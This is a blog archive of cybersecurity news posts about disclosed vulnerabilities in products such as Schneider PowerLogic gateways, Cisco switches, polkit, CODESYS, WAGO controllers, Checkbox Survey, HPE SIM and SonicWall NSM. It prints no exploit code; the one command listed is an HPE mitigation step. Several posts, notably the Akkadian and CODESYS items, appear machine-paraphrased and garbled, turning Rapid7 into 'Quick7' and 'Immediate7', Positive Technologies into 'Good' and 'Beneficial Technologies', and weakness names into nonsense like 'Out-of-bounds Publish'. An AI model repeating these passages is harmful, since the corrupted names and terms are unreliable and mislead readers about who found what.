Search This Blog

Showing posts with label Vulnerabilities and Exploits. Show all posts

Six Major Flaws Identified in Schneider PowerLogic Devices

 

Earlier this month, Schneider Electric, a global supplier of energy and automation digital solutions published a security advisory for its customers stating the discovery of six major flaws in PowerLogic EGX100 and EGX300 communication gateways. Threat actors can exploit these security holes to access devices, launch denial-of-service (DoS) attacks, and for remote code execution. 

Security researchers have rated five of the security holes in the high severity category. They can be exploited for DoS attacks or remote code execution using specially designed HTTP products. The sixth flaw is related to the password recovery mechanism and it can be exploited to gain administrator-level access to a device. 

Jake Baines, a principal industrial control vulnerability analyst at industrial cybersecurity firm Dragos, assigned the flaws from CVE-2021-22763 to CVE-2021-22768. The flaws were identified in EGX devices, but Schneider has determined that two of the flaws also affect PowerLogic PM55xx power metering devices due to their sharing web server code. The affected devices are part of the company’s power monitoring and control offering, but they have reached the end of life.

“For example, CVE-2021-22763 is a backdoor account that gives full admin access to the device's web server. As long as the attacker can reach the server, and knows the device's ethernet address, they have full administration rights to the device. Although, this is largely only useful to an attacker to block access to the connected serial devices, so the true impact of the attack is dependent on the connected devices.CVE-2021-22764 is a similar situation. A remote and unauthenticated adversary can send HTTP requests that will cause the device to block access to the connected serial devices,” Baines said while explaining a few theoretical attack scenarios that attackers could use to exploit vulnerabilities.

“The more interesting, but more complicated are the vulnerabilities scored 9.8. These all allow an unauthenticated and remote attacker to run arbitrary code on the device. The vulnerabilities are stack-based buffer overflows, so writing a full exploit would take effort. While it's possible that could happen, it's unlikely that it actually has or ever will. However, the ability to run code on the device is interesting because it would allow the adversary to alter communication between the connected serial device and the monitoring/control systems,” he further described.

PowerLogic EGX100 and EGX300 devices have reached the end of life and are no longer useful. Users can either replace the products or execute mitigations recommended by the firm to minimize the risk of exploitation.

Cisco Smart Switches Detected with Vulnerabilities

 

In Cisco's Small Business 220 Series smart switches a researcher has uncovered various vulnerabilities, especially those with high severity assessments. This Monday, the networking giant advised its consumers that patches for these vulnerabilities are available. 

The impact switch runs firmware versions earlier than 1.2.0.6 and has the web-based management interface enabled. 

Cisco Systems, Inc. is a US conglomerate based in San Jose, California, in the Silicon Valley center. Cisco designs manufacture and distribute high-tech services and products for networking hardware, software, telecommunications equipment, and others. 

Security researcher Jasper Lievisse Adriaanse has identified the vulnerabilities. He discovered four kinds of safety holes on the small enterprise switch as published in a notice by Cisco. 

One can be used by a remote, unverified attacker, tracked as CVE-2021-1542, which is rated as high severity to take over the user session and obtain access to the web portal of a switch. The attacker could acquire managerial access to the management interface, based on the rights of the potential customer. 

Another high-severity problem is CVE-2021-1541, which enables a remote device attacker with admin access to perform arbitrary root-privileged commands on the operating system underneath it. 

The two other weaknesses identified by the investigator, both of which were Cisco's medium severity, might allow a remote attacker to initiate XSS (CVE-2021-1543) or HTML injection attacks (CVE-2021-1571). 

“[In the case of the] XSS flaw, the vector which I tested and verified was by exploiting a vulnerability in how certain packets which are only valid on the same L2 domain are parsed,” Adriaanse explained. 

He added, “It should be possible, if you’re on the same L2 domain, to perform the XSS attack through CVE-2021-1543, obtain the CSRF token and perform arbitrary actions as the logged-in user. As I don’t write a lot of Javascript I didn’t attempt to write a payload to subsequently exploit CVE-2021-1541. Note however that due to lacking Content-Security-Policy headers you can use CVE-2021-1543 to include remote Javascript code. So you’re not limited by the packet size of the abused L2 protocol. I guess with enough experience and determination one could concoct a payload to do anything in the UI.” 

The XSS defect is due to inspections by the web-based management interface of the device being submitted by the user. An attacker could use this error by deceiving the victims into clicking a malicious link and accessing a certain page. The attacker may induce weakness in running arbitrary script code in connection with the affected interface or access sensitive, browser-based information. 

The HTML Injection Vulnerability is caused by faulty parameter checks on affected pages. In order to address certain vulnerabilities, Cisco has published software updates. 

SIP Protocol Exploited to Trigger XSS Attacks via VoIP Call Monitoring Software

 

According to new research, the SIP communications protocol can be exploited to conduct cross-site scripting (XSS) assaults. 

In a blog post published on June 10, the Session Initiation Protocol (SIP), the technology used to manage communication across services such as Voice over IP (VoIP), audio, and instant messaging, can be used as a conduit to perform app-based assaults on software, as per Enable Security's Juxhin Dyrmishi Brigjaj. 

This includes cross-site scripting (XSS) assaults, in which users' browser sessions may be stolen, same-origin restrictions may be bypassed, and user impersonation may occur for objectives such as theft, phishing, or malware deployment. 

In the worst-case situation, according to Dyrmishi Brigjaj, this might lead to an "unauthenticated remote compromise of vital systems." 

The study looked into the case of VoIPmonitor, an open-source network packet sniffer that system administrators use to examine the quality of VoIP calls based on various network metrics. During an offensive security audit, a flaw in the software's graphical user interface (GUI) was uncovered. 

The monitoring of SIP device register requests is one of the GUI's functions. The monitoring system also includes the type of device that submitted the SIP register message via a User-Agent header value. This value is represented in the user's web browser's DOM. It may lead to the execution of malicious code in the hands of criminals. 

The researchers note, “At face value, this might not seem like much, and in the real world I’d use something less obvious, relying on some canary token or callback. However, keep in mind that this code is executed in an administrator’s browser and is stored there for a period of time.” 

According to Brigjaj, execution code during a brief window of opportunity can result in privilege escalation and full, permanent admin access. 

This would be accomplished by creating an administrator account in the system and storing a new JavaScript payload. 

As a result, the vulnerability could result in data and traffic exfiltration, the hijacking of other administrator accounts, and the deployment of malware such as keyloggers, backdoors, and more. 

On February 10, Enable Security reported its findings to VoIPmonitor, and the project's developers fixed the security issue on February 22 by adding new XSS mitigation measures. 

Users of VoIPmonitor are advised to upgrade to the most recent version, v.24.71. Enable Security tested the fix and determined that the avenue to the XSS attack vector had been eliminated.

Three Unpatched Bugs Spotted in Third-Party Provisioning Platform

 

Researchers at Rapid7 have unearthed three highly critical security flaws in Akkadian Provisioning Manager, a third-party provisioning tool within Cisco Unified Communications environments that can be chained together to enable remote code execution (RCE) with elevated privileges.

Cisco’s UC suite allows VoIP and online video communications across enterprise footprints. The Akkadian products are equipment that is generally employed in huge enterprises to enable handle the method of provisioning and configuring all of the UC clientele and scenarios, via automation.

The flaws present in version 4.50.18 of the Akkadian edition, are as follows: 

•CVE-2021-31579: Use of tough-coded credentials (ranking 8.2 out of 10 on the CVSS vulnerability-severity scale)

•CVE-2021-31580 and CVE-2021-31581: Improper neutralization of specific components used in an OS command (using exec and vi commands, respectively; ranking 7.9) 

•CVE-2021-31582: Publicity of sensitive information to an unauthorized actor (ranking 7.9)

The combination of CVE-2021-31579 with either CVE-2021-31580 or CVE-2021-31581 will allow an unauthorized adversary to acquire root-degree shell entry to affected equipment, as per Quick7. That will make it straightforward to install cryptominers, keystroke loggers, persistent shells, and any other form of Linux-primarily based malware. 

CVE-2021-31582 allows an attacker who is presently authenticated to the unit to alter or delete the contents of the regional MariaDB database, which is free of charge and an open-source fork of the MySQL relational databases administration process. In some cases, attackers could recover LDAP BIND credentials in use in the host organization, which are used to authenticate clients (and the consumers or applications behind them) to a directory server. 

“In addition to these issues, two other questionable findings were discovered: The ability to read the cleartext local MariaDB credentials, and the inadvertent shipping of an entire GitHub repo with commit history. At the time of this writing, it’s unclear if these findings present unique security issues, but should be reviewed by the vendor,” the company explained, in a blog post this week. 

Security recommendations for organizations 

To guard their environments, firms ought to restrict network access to the SSH port (22/tcp), so that only trustworthy people are allowed on, and disable any internet-facing connectivity, Rapid7 advised.

“Furthermore, system operators should know that, in the absence of a fix, users who have access to the Akkadian Appliance Manager effectively have root shell access to the device, due to the second and third issues,” according to the assessment. 

Rapid7 disclosed the flaws to Akkadian in February, but irrespective of multiple adhere to-ups, there is been no response, in accordance with Immediate7. 

Facebook Messenger Rooms Exploit Bypasses Android Screen Lock Protection

 

As a result of a security flaw in Facebook's Messenger Rooms video chat function, attackers are able to gain access to a victim's private Facebook photographs and videos, as well as submit posts, from their locked Android screen. Messenger Rooms, Facebook's newest video conferencing service, allows up to 50 individuals to video chat at the same time. You can converse for as long as you want, and you don't need a Facebook account to join a room. 

Rooms calls, like Zoom calls, are not secured end-to-end. Unless you change your preferences, the room will be open to anybody you're friends with on Facebook when you create it; they'll not only be able to join, but they'll also see it at the top of their News Feed. According to a proof-of-concept video supplied to Facebook with the vulnerability report, a user's Facebook account may be hacked by inviting them to a Messenger Room, then calling and answering the call from the target device before clicking on the chat function. 

Despite the fact that physical access to a victim's device is required, the assault could be carried out without the victim's smartphone or tablet being unlocked, earning Nepalese security researcher Samip Aryal a $3,000 bug bounty. 

Aryal's newest discovery was inspired by a similar Facebook Messenger flaw he discovered in October 2020, in which users' private, saved videos and watching history might be exposed during a Messenger call via the Watch Together function. The fault, which could be exploited by an attacker with physical access to a locked Android smartphone, was patched along with other comparable flaws by requiring users to unlock their phones before utilizing the impacted features. 

The researcher, who was logged into a Facebook account through a desktop PC, hosted a Messenger Room and invited an account that was active on an Android device to join. After entering the room with the 'malicious' account, he called the victim's device from the 'invited users' section, and the target, screen-locked smartphone began ringing within seconds. “I then picked up the call and tried all previously known sensitive features like ‘watch together’, ‘add people’, etc. but all of them needed to first unlock the phone before using them,” said Aryal. 

The discovery came when the researcher saw a request in the top right-hand corner of the call screen to ‘chat' with other participants. “I found that I could access all private photos/videos on that device without even unlocking the phone, as well as submit posts by clicking on the ‘edit’ option for any media”, he said.

CyRC Identifies Three Major DoS Flaws in Popular Open Source Message Brokers

 

Synopsys Cybersecurity Research Centre (CyRC) has warned organizations of easily triggered denial-of-service (DoS) vulnerabilities in three widely used open-source message brokers: RabbitMQ, EMQ X, and VerneMQ. 

A message broker is a software that enables applications, systems, and services to communicate with each other and exchange information by translating messages between formal messaging protocols. It is responsible for managing IoT devices like smart home hubs and door locks via common protocol: Message Queuing Telemetry Transport (MQTT). 

MQTT, first released in 1999 is responsible for managing oil pipelines and a variety of home and industrial automation tasks. Any disruption in MQTT messaging could potentially leave users locked out of their homes and offices.

“Message brokers can be the nerve center of a complex system. If the message broker isn't working, then the various components of the system cannot communicate. Whatever services are provided by that system are unavailable until the message broker is restored,” Jonathan Knudsen, the researcher who identified the vulnerabilities, told SecurityWeek. 

Jonathan Knudsen identified that specially crafted MQTT messages can cause excessive memory consumption in RabbitMQ (owned by VMware), EMQ X, and VerneMQ, leading to the operating system terminating the application.

“These vulnerabilities can be exploited by any system that has access to the message broker. The broker can be configured to require authentication or refuse connections from unrecognized endpoints which would limit external attacks. But for an attacker with access to one of the vulnerable message brokers, the vulnerabilities can be exploited simply by delivering a badly formed network packet, which can be done with a very simple script,” Knudsen explained.

According to EMQ, its message broker has been installed more than 2 million times and it has over 5,000 users globally. RabbitMQ claims to have tens of thousands of users, including small startups and large enterprises. VerneMQ is used by companies such as Microsoft, Volkswagen, Siemens, and Swisscom.

Knudsen and CyRC privately disclosed the flaws to the project maintainers back in March, and all three have now been patched. RabbitMQ users are advised to upgrade to version 3.8.16 or above; EMQ X users to version 4.2.8 or above, and VerneMQ users to version 1.12.0 or above.

GitHub Releases Key Findings of an Easy-to-Exploit Linux flaw

 

Kevin Backhouse, a researcher at GitHub Security Lab revealed the details of an easy-to-exploit Linux flaw that can be exploited to escalate privileges to root on the targeted system. The vulnerability, classified as highly critical and termed as CVE-2021-3560, affects polkit, a system service installed by default on many Linux distributions.

On Thursday, Kevin published a blog post explaining his findings, as well as a short video detailing the exploit in polkit. A local, unprivileged attacker can use the flaw to escalate privileges to root with only a few commands executed in the terminal. 

Security researchers have admitted the vulnerability termed CVE-2021-3560 impacts some versions of Red Hat Enterprise Linux, Fedora, Debian, and Ubuntu. On June 3, a patch for CVE-2021-3560 was released. 

“The bug I found was quite old. It was introduced seven years ago in commit bfa5036 and first shipped with polkit version 0.113. However, many of the most popular Linux distributions didn’t ship the vulnerable version until more recently,” Backhouse stated.

“The bug has a slightly different history on Debian and its derivatives (such as Ubuntu) because Debian uses a fork of polkit with a different version numbering scheme. In the Debian fork, the bug was introduced in commit f81d021 and first shipped with version 0.105-26. The most recent stable release of Debian, Debian 10 (“buster”), uses version 0.105-25, which means that it isn’t vulnerable, ”Backhouse further added. 

Polkit is a system service developed for controlling system-wide privileges, creating a way for non-privileged processes to communicate with privileged processes. Backhouse described it as a service that plays the role of a judge, determining whether an action initiated by a user — specifically one that requires higher privileges — can be carried out directly or requires additional authorization, such as entering a password.

The vulnerability identified by the researcher is easy to manipulate, with just a few commands in the terminal. However, due to some timing requirements, it normally takes a few attempts for the exploit to be successful.

CVE-2021-3560 allows an unprivileged local hacker to gain root privileges. It’s very simple and quick to exploit, so users must update their installations as quickly as possible. Any system that has polkit version 0.113 (or later) installed is vulnerable. That includes popular distributions such as RHEL 8 and Ubuntu 20.04.

Linux System Service Bug Allows You to Gain Root Access

 

An authentication bypass vulnerability in the polkit auth system service, which is installed by default on many recent Linux distributions, allows unprivileged attackers to gain a root shell. On June 3, 2021, the polkit local privilege escalation flaw (CVE-2021-3560) was officially identified, and a fix was released. Polkit is used by systemd, hence it's included in any Linux distribution that uses systemd. 

Kevin Backhouse, a GitHub security researcher, detailed how he discovered the bug (CVE-2021-3560) in a systemd service called polkit in a blog post on Thursday. The problem, which was first introduced in commit bfa5036 seven years ago and first shipped in polkit version 0.113, took various pathways in different Linux distributions. Despite the fact that many Linux distributions did not ship with the vulnerable polkit version until recently, any Linux machine with polkit 0.113 or later installed is vulnerable to attacks. 

Polkit, formerly known as PolicyKit, is a service that determines whether certain Linux tasks require more privileges than there are currently available. It comes into play when you want to establish a new user account, for example. According to Backhouse, exploiting the issue is shockingly simple, needing only a few commands utilizing common terminal tools such as bash, kill, and dbus-send. 

"The vulnerability is triggered by starting a dbus-send command but killing it while polkit is still in the middle of processing the request," explained Backhouse. Polkit asks for the UID of a connection that no longer exists, therefore killing dbus-send — an interprocess communication command – in the middle of an authentication request creates an error (because the connection was killed). 

"In fact, polkit mishandles the error in a particularly unfortunate way: rather than rejecting the request, it treats the request as though it came from a process with UID 0," explains Backhouse. "In other words, it immediately authorizes the request because it thinks the request has come from a root process."

Because polkit's UID query to the dbus-daemon occurs numerous times throughout different code paths, this doesn't happen all of the time. According to Backhouse, those code pathways usually handle the error correctly, but one is vulnerable, and if the disconnection occurs while that code path is running, privilege escalation occurs. It's all about timing, which varies in unanticipated ways due to the involvement of various processes. Backhouse believes the bug's intermittent nature is why it went unnoticed for seven years.

Major Security Flaw Patched by Hyperkitty

 

Hyperkitty, a Django-based application responsible for providing a web interface for the popular open-source mailing list and newsletter management service Mailman, has patched a critical flaw that disclosed personal mailing lists while importing them.

Amir Sarabadani, a software engineer at Wikimedia Deutschland, identified the flaw while upgrading Wikimedia's mailing lists from Mailman 2 to Mailman 3.

“We were upgrading a test mailing list that was private but realized during the upgrade it was public. Once the upgrade was done, the list would become private. Private mailing lists can contain sensitive information, like publicly identifiable information,” Sarabadani stated. 

“When importing a private mailing lists archives, these archives are publicly visible for the duration of the import,” reads the security advisory on GitHub. This means a threat actor would be able to access the personal information of the users.

Security researchers marked the flaw in the critical list with a severity score of 7.5. The latest version of Hyperkitty has patched the flaw by obtaining privacy configurations of imported lists from Mailman instead of using default settings. According to the GitHub advisory, upgrades from older versions of Mailman to version three can last more than an hour. 

According to Sarabadani the impact of the flaw depends on the mailing list and how large it is. “Private mailing lists can contain sensitive information, like publicly identifiable information. If you communicated publicly that mailing lists are being upgraded [at] certain dates and times as a maintenance window (which you would usually), an attacker can use the opportunity to extract as much private data as possible, especially since Hyperkitty allows you to download all of the archives in batch.” Sarabadani further added.

“Don’t take security for granted. A new software being deployed in your infra, no matter how mature, can still have rather major security issues.”

The latest research revealed that nearly 41 percent of executives do not execute open-source governance in their organizations, a problematic figure considering that open-source components underpin vast sections of enterprise applications and networks. Security flaw in Hyperkitty caused the partially imported list to be marked as public regardless of its privacy setting in Mailman. 

WAGO Controller Flaws Can Allow Hackers to Interrupt Industrial Processes

 

According to Russian cybersecurity firm Positive Technologies, a lot of vulnerabilities found in industrial controllers made by WAGO can be abused to obstruct technological processes, which in some cases could lead to industrial accidents. 

WAGO is a German company that manufactures components for electrical connections and electronic components for decentralized automation. 

The vulnerabilities were discovered in the WAGO PFC200 programmable logic controller (PLC), which the vendor has now addressed. One of the issues, tracked as CVE-2021-21001, has been defined as a path traversal issue involving a CODESYS component utilized by the device and is graded critical severity. 

It allows a network-connected attacker with elevated capabilities to access the target device's file system by delivering specially designed packets. 

Vladimir Nazarov, head of ICS security at Positive Technologies explained, “By exploiting this vulnerability, attackers can access the controller file system with read and write rights. Changes in the PLC file system may cause disruption of technological processes and even lead to industrial accidents.” 

The second vulnerability, CVE-2021-21000, is a medium-severity problem that affects WAGO's iocheckd service, which is used to check PLC input/output and demonstrate the PLC configuration. This weakness can be exploited by an unauthenticated intruder with network access to the device to cause a DoS condition. 

“Exploitation may cause a sudden shutdown of the controller, and in turn interrupt technological processes,” Positive Technologies explained. 

These flaws, along with ten others uncovered by Positive Technologies in CODESYS industrial automation software, were disclosed by Germany's VDE CERT in May. 

The 10 CODESYS flaws, the majority of which were rated critical or high severity, affected ICS systems from more than a dozen vendors who use CODESYS software. 

The US government recently sanctioned Positive Technologies for allegedly assisting Russian intelligence agencies. However, the company stated that it will continue to responsibly disclose vulnerabilities discovered by its employees in major U.S. corporations' products.

Cisco Discovers High-Severity Flaws in its Software

 

The IT and networking giant Cisco has outlined multiple vulnerabilities in its Webex, SD-WAN, and ASR 5000 devices, that could potentially allow an arbitrary code execution by the attackers for the legitimate reason. 

Although Cisco has provided patches for a wide range of vulnerabilities, particularly updates for high-risk issues in the widely used Webex Player, SD-WAN, and ASR 5000 Series. 

A total of three flaws of high severity ( CVSS score of 7.8 ) have been addressed and patched for Windows and macOS in Webex Player, two of those also compromise the operating systems' Webex Network Recording Player. 

The first bug, CVE-2021-1526, is a problem of memory degradation that can be exploited by arbitrary code on a vulnerable computer. Manipulated Webex Recording Format(WRF) files could misuse the vulnerabilities. 

The problem affects the Cisco Webex Player for Windows and macOS launches before the 41.5 version of it but does not influence the Webex Network Recording Player. 

Memory corruption problems that harm both the Webex Network Recording Player and Webex Player are indeed the following two vulnerabilities - the CVE-2021-1502 and the CVE-2021-1503 - on Windows and macOS both. 

Both can be used to arbitrarily execute code on the system concerned. Both of these issues are resolved in version 41.4 of Webex player and Webex Network Recording Player. 

In addition, recently, Cisco issued updates for SD-WAN software CVE-2021-1528 a high risk (CVSS score of 7.8), that might be used to get high privileges on a vulnerable server. This bug affects the SD-WAN versions 20.4 and 20.5 (vBond Orchestrator, vEdge Cloud, and vEdge Routers and vManage, vSmart Controller) but has been addressed with version 20.4.2 and 20.5.1 of SD-WAN. 

Cisco has also issued updates that might be leveraged to bypass permission and execute CLI commands on a damaged computer for several vulnerabilities in the ASR 5000 Series Software (StarOS). CVE 2021-1539 is the most significant of these defects (CVSS score of 8.1). 

Cisco urges consumers to upgrade to each product's patched versions as soon as possible. Furthermore, the corporation emphasizes that it is not known that these vulnerabilities are exploited in attacks. Cisco has also released information on other medium-risk vulnerabilities affecting its portfolio of different products, including Webex Meetings, Webex Player, ThousandEyes Recorder, IP cameras Video Surveillance 7000, and Common Services Platform Collector (CSPC). 

The Company also highlighted that several vulnerabilities detected in the frame aggregation and fragmentation features following 802.11 standards have affected several of its products. An attacker could easily misuse such defects to forge encrypted frameworks and to exfiltrate sensitive device data.

Serious Flaws Identified in CODESYS Industrial Automation Software

 

Cybersecurity researchers at Russian cybersecurity firm Positive Technologies discovered as many as ten critical flaws impacting CODESYS automation computer software that could be exploited to remote code execution on programmable logic controllers (PLCs). 

The Russian cybersecurity firm initially discovered the vulnerabilities in a programmable logic controller (PLC) available by WAGO, but further investigation revealed that the issues were actually introduced by CODESYS software that is used by more than a dozen automation technology firms including Beckhoff, Kontron, Moeller, Festo, Mitsubishi, HollySys and several Russian companies.

CODESYS offers a better environment for programming controller programs used in industrial control systems. The German software organization credited Vyacheslav Moskvin, Denis Goryushev, Anton Dorfman, Ivan Kurnakov, and Sergey Fedonin of Good Technologies and Yossi Reuven of SCADAfence for identifying the vulnerabilities.

“To exploit the vulnerabilities, an attacker does not need to have a username or password obtaining network obtain to the industrial controller is ample. The main result of the vulnerabilities is insufficient verification of enter information, which may well itself be triggered by failure to comply with the protected improvement tips,” scientists from Positive Technologies stated.

Six of the most critical flaws were discovered in the CODESYS V2.3 web server component used by CODESYS WebVisu to visualize a human-device interface (HMI) in a web browser. The flaws could perhaps be leveraged by an adversary to send specifically-designed web server requests to trigger a denial-of-support condition, publish or study arbitrary code to and from a manage runtime system’s memory. 

All the 6 flaws have been rated critical on the CVSS scale — 
• CVE-2021-30189 – Stack-dependent Buffer Overflow 

• CVE-2021-30190 – Improper Accessibility Handle 

• CVE-2021-30191 – Buffer Copy without Checking Sizing of Input 

• CVE-2021-30192 – Improperly Executed Security Examine 

• CVE-2021-30193 – Out-of-bounds Publish 

• CVE-2021-30194 – Out-of-bounds Examine 

“Their exploitation can guide to distant command execution on PLC, which could disrupt technological procedures and result in industrial incidents and financial losses. The most infamous illustration of exploiting very similar vulnerabilities is by applying Stuxnet,” explained Vladimir Nazarov, Head of ICS Security at Beneficial Technologies. 

CODESYS has published an advisory for its CODESYS V2 web server, Runtime Toolkit, and PLCWinNT products to address the vulnerabilities. The company has published separate advisories for the critical, high, and medium-severity issues while recommending users to install the updates. 

Last month, the Treasury Department of the U.S. government sanctioned Positive Technologies for allegedly supporting Kremlin intelligence agencies. However, the company said it will continue to responsibly disclose the flaws discovered by its employees in the products of major U.S. firms.

Every tenth significant IT system in Russia is infected with malware

 According to Rostelecom-Solar research, every 10th critical information infrastructure (CII) in the Russian Federation is compromised by malware. Even hackers with low qualifications are able to attack most of these IT networks: a significant part of the detected vulnerabilities have existed for more than 10 years, but organizations have not prevented them.

Vladimir Drukov, director of the Cyber Attack Monitoring and Response Center at Rostelecom-Solar, associates the presence of vulnerabilities in CII with the fact that the process of regular software updates has not yet been established in more than 90% of companies.

Kaspersky Lab experts agreed with the findings of the study. According to Anton Shipulin, Lead Business Development Manager at Kaspersky Industrial CyberSecurity, cybersecurity is still at a low level in most CII facilities.

"In terms of data protection, a large number of CII objects are currently in a "depressing situation", and there are no serious hacker attacks on them "by happy accident", but it is only a matter of time," added Fedor Dbar, Commercial Director of Security Code.

In addition, the number of hosts with the vulnerable SMB protocol has almost doubled. It is a network protocol for sharing files, printers, and other network resources that is used in almost every organization. Such vulnerabilities are particularly dangerous, as they allow hackers to remotely run arbitrary code without passing authentication, infecting all computers connected to the local network with malware.

The main problem in internal networks is incorrect password management. Weak and dictionary passwords that allow an attacker to break into an organization's internal network are extremely common. Password selection is used by both amateur hackers and professional attackers.

Moreover, the pandemic has also significantly weakened IT perimeters. Over the past year, the number of automated process control systems (APCS) available from the Internet has grown by more than 60%. This increases the risks of industrial espionage and cyber-terrorism.


Security Experts Unearthed the Flaws in EPUB Similar to Web Browsers

 

Security researchers at imec-DistriNet Research Group have discovered the vulnerabilities in e-book reading systems that allow hackers to exploit the user’s system by targeting the specific aspects of the electronic publication (EPUB). 

Security researchers Gertjan Franken, Tom Van Goethem, and Wouter Joosen published a research paper that reads that e-book reading systems have similar flaws to web browsers. The electronic publication (EPUB) format depends primarily on XHTML and CSS (Cascading Style Sheets) to design e-books, with browser engines often used to render their contents.

Unfortunately, none of the e-book reading systems researchers properly followed the EPUB specification’s security guidelines. The researchers used the semi-automated testbed to identify that 16 of the 97 systems allowed an EPUB to leak information about the user’s file system, and in eight cases, extract file contents. Researchers warned that hackers could easily achieve full e-book reading systems.
 
"Of course, the significance depends on the platform that is used; e-readers generally won't contain sensitive files, while smartphones could contain private pictures," Franken told The Daily Swig. The team also carried out a manual evaluation of the most popular EPUB reading applications on Amazon Kindle, Apple Books, and the EPUBReader browser extension - and found several flaws.

"For instance, the Amazon Kindle does not allow an EPUB to execute embedded JavaScript. Nevertheless, this can be circumvented by a creative attacker through an input validation issue. The embedded scripts could then exploit a publicly known vulnerability of the Kindle's outdated web engine to gain access to documents in the user's library. The embedded scripts could then exploit a publicly known vulnerability of the Kindle's outdated web engine to gain access to documents in the user's library," Franken explained.

Vulnerabilities were also discovered in Apple Books, available pre-installed on macOS, and in the Windows version of Adobe Digital Editions. 

"Fortunately, the developers of Amazon, Apple, and Adobe were very responsive to our bug reports and were eager to fix the issues. Secondly, we argue that practical guidelines on how to handle the security and privacy aspects of developing a EPUB reading application would greatly aid developers. Ideally, this would include guidelines on how to correctly configure popular browser engines, such that important security policies prevent an EPUB from gaining too much [many] privileges,” Franken concluded.

An Advisory Issued by Carnegie Mellon University Warns Against the Vulnerability in Checkbox Survey

 

In the wild, CERT Coordination Center (CERT/CC) in Carnegie Mellon University alerts about a Checkbox Survey vulnerability that might enable a remote attacker to unleash arbitrary code without actual identification. 

A checkbox is a GUI widget that allows the user to choose between one of the two mutually exclusive alternatives. The Checkbox Survey allows organizations generate professional surveys with quick access from any desktop or mobile device, as a customizable online surveillance tool designed in ASP.NET. For example, a basic yes/no inquiry may ask the user to answer in 'yes' or 'no.' Checkboxes will be displayed with the required choices. 

This vulnerability in the Checkbox Survey, which was identified as CVE-2021-27852, is linked to the insecure deserialization of view state data, a technique applied by the ASP.NET web page framework. 

Microsoft stated that “When the HTML markup for the page is rendered, the current state of the page and values that must be retained during postback are serialized into base64-encoded strings. This information is then put into the view state hidden field or fields.”

By using a _VSTATE arguments, before version 7.0 – the Checkbox survey engaged its View State functionality that is deserialized using Los Formatter. 

“Checkbox Survey before version 7.0 insecurely deserializes ASP.NET View State data, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable server, “ read the advisory.

The Checkbox Survey Code organizes the data but overlooks the server configuration of the ASP.NET View State Message Authentication Code (MAC), which an attacker can effectively use to generate a piece of unexpected information that could lead to the execution of the code in the deserialized version. 

The advisory further states that “Checkbox Survey is an ASP.NET application that can add survey functionality to a website. Before version 7.0, Checkbox Survey implements its View State functionality by accepting a _VSTATE argument, which it then deserializes using Los Formatter. Because this data is manually handled by the Checkbox Survey code, the ASP.NET View State Message Authentication Code (MAC) setting on the server is ignored. Without MAC, an attacker can create arbitrary data that will be deserialized, resulting in arbitrary code execution.” 

As an impact of the flaw, a remote, unauthenticated attacker can perform arbitrary Code with the capabilities of a web server by creating a specific request to a server using the Checkbox Survey 6.x. 

View State Data is not being used from Checkbox Survey 7.0. This vulnerability is therefore not included in Checkbox Survey Versions 7.0 or later. One must remove the Checkbox Survey of versions older than 7. 

Also, Checkbox said that they no longer develop Checkbox Survey 6 version, hence it is not at all safe to use this version. If one cannot update to an unimpaired Checkbox Survey version, then at least this software must be deleted from every machine it is installed in.

HPE Patches the Zero-Day Vulnerabiity in Systems Insight Manager Software for Windows

 

Hewlett Packard Enterprise (HPE) has released a security update to patch critical zero-day remote code execution (RCE) vulnerability in its HPE Systems Insight Manager (SIM) software for Windows that it initially revealed in December 2020.

HPE updated its original security advisory on Wednesday. However, the SIM hotfix update kit which resolves the flaw was published more than a month ago, on April 20. HPE SIM is a management and remote support automation tool for Windows and Linux intended to be used with the company's servers, storage, and networking products, including the HPE ProLiant Gen10 and HPE ProLiant Gen9. 

Security researchers labeled the flaw (CVE-2020-7200) as an ‘extremely high-risk’ flaw. It allows attackers with no privileges to remotely execute the code and is commonly found in the latest versions (7.6.x) of HPE’s SIM software and specifically targets the Windows version. This bug allows low-complexity attacks that don’t require user interaction.

“This module exploits this vulnerability by leveraging an outdated copy of Commons Collection, namely 3.2.2, that ships with HPE SIM, to gain remote code execution as the administrative user running HPE SIM,” according to Packet Storm. The lack of proper validation of user-supplied data can lead to the deserialization of untrusted data, enabling attackers to execute code on servers running vulnerable SIM software.

HPE has released a security advisory for the system admins who are unable to deploy the CVE-2020-7200 security update on vulnerable systems. To safeguard your devices, HPE has provided mitigation measures that involve removing the “Federated Search” & “Federated CMS Configuration” features that allowed the vulnerability.

System admins who use the HPE SIM management software have to use the following procedure to block CVE-2020-7200 attacks: 

1. Stop HPE SIM Service 

2. Delete file from sim installed path del /Q /F C:\Program Files\HP\Systems Insight Manager\jboss\server\hpsim\deploy\simsearch.war 

3. Restart HPE SIM Service

4. Wait for HPE SIM web page "https://SIM_IP:50000" to be accessible and execute the following command from command prompt. mxtool -r -f tools\multi-cms-search.xml 1>nul 2>nul

By following the above procedures system admins can be prevented from being exploited by potential attackers, it will also mean that HPE SIM users can no longer use the federated search feature.

SonicWall Urges Customers to 'immediately' Patch NSM On-Prem Bug

 

SonicWall urges customers to “immediately” patch a post-authentication vulnerability that impacts on-premises versions of the Network Security Manager (NSM) multi-tenant firewall management solution.

The CVE-2021-20026 vulnerability affects NSM 2.2.0-R10-H1 and previous versions, and it was patched by SonicWall in NSM 2.2.1-R6 and 2.2.1-R6 (Enhanced) versions. It has an 8.8/10 severity rating from SonicWall, and authenticated intruders can use it for OS command injection in low-complexity attacks that don't require user interaction. 

The SonicWall stated, "This critical vulnerability potentially allows a user to execute commands on a device's operating system with the highest system privileges (root). This vulnerability only impacts on-premises NSM deployments, SaaS versions of NSM are not affected." 

SonicWall is urging consumers to patch their devices instantaneously, despite the fact that the business did not mention an immediate threat of attackers exploiting this vulnerability or active in the wild exploitation. 

"SonicWall customers who are running the on-premises NSM versions listed below should upgrade to the patched version as soon as possible," the company advised. 

When requested for comment by Bleeping Computer, SonicWall refused to provide any specifics about the active exploitation of CVE-2021-20026, instead responded with the information in the security advisory. 

Several SonicWall appliance vulnerabilities have been targeted by threat actors this year. Many of them are zero-days that were actively exploited in the wild before the company released fixes. SonicWall fixed an actively exploited zero-day vulnerability affecting the SMA 100 series of SonicWall networking devices in February. 

A financially motivated threat actor, which was tracked down by Mandiant threat analysts  as UNC2447, took advantage of another zero-day in SonicWall SMA 100 Series VPN appliances to spread newly found FiveHands ransomware on the networks of North American and European targets. 

In January, the same zero-day bug was exploited in assaults targeting SonicWall's internal systems, and it was afterward exploited indiscriminately in the wild. SonicWall patched three more zero-day vulnerabilities discovered in the wild in March, impacting the company's on-premises and hosted Email Security (ES) products. 

